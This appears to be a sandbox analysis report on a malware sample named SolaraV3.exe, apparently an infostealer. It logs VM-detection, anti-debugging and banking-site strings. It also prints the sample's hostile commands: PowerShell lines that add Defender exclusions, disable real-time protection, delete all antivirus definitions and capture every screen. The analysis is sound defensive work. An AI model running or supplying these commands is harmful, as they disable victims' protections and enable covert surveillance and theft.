Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Evaded block: after key decision
Source: C:\Users\user\Desktop\SolaraV3.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\SolaraV3.exe API coverage: 4.9 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296 Thread sleep count: 8015 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296 Thread sleep count: 1366 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep count: 7779 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256 Thread sleep count: 1625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4908 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840 Thread sleep count: 6689 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840 Thread sleep count: 2824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 1348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056 Thread sleep count: 5447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 Thread sleep count: 1321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep count: 4059 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep count: 201 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep count: 5225 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep count: 877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376 Thread sleep count: 4076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396 Thread sleep count: 284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose, 1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose, 2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte, 2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED88E0 FindFirstFileExA, 110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 110_2_00007FF74EE8E21C
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtrayZ
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: svchost.exe, 0000001A.00000002.2809507862.000001407B22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811395049.000001407C854000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvcZ
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmusrvcZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MW
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer5
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxserviceZ
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray
Source: SolaraV3.exe, 00000002.00000003.1920657343.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2042793103.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1767469686.000001FC256C4000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1919694922.000001FC2612A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2526D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2045845216.000001FC2611B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1579360087.000001FC25402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: rar.exe, 0000006E.00000003.1935668462.000001DD0C739000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: getmac.exe, 0000005B.00000003.1777948057.00000236408A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777616203.000002364089F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779115042.00000236408A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuserZ
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qemu-gaZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000002.1779208598.00000236408C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000005B.00000003.1777587060.00000236408BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwarec
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretrayZ
Source: getmac.exe, 0000005B.00000003.1777433293.000002364087B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-Vf
Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservicer5Z
Source: SolaraV3.exe, 00000002.00000003.1767469686.000001FC256AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815731 2_2_00007FFB0B815731
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B814246 2_2_00007FFB0B814246
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815731 rdtsc 2_2_00007FFB0B815731
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0BB66EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FFB0BB66EE0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC723480 GetProcessHeap, 1_2_00007FF6DC723480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC70D30C SetUnhandledExceptionFilter, 1_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC71A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF6DC71A614
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70D12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF6DC70D12C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70C8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00007FF6DC70C8A0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC70D30C SetUnhandledExceptionFilter, 2_2_00007FF6DC70D30C
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B815A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FFB0B815A24
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0C3C0376 SetUnhandledExceptionFilter, 2_2_00007FFB0C3C0376
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 110_2_00007FF74EED4C10
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EECB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 110_2_00007FF74EECB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EECB6D8 SetUnhandledExceptionFilter, 110_2_00007FF74EECB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EECA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 110_2_00007FF74EECA66C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SolaraV3.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
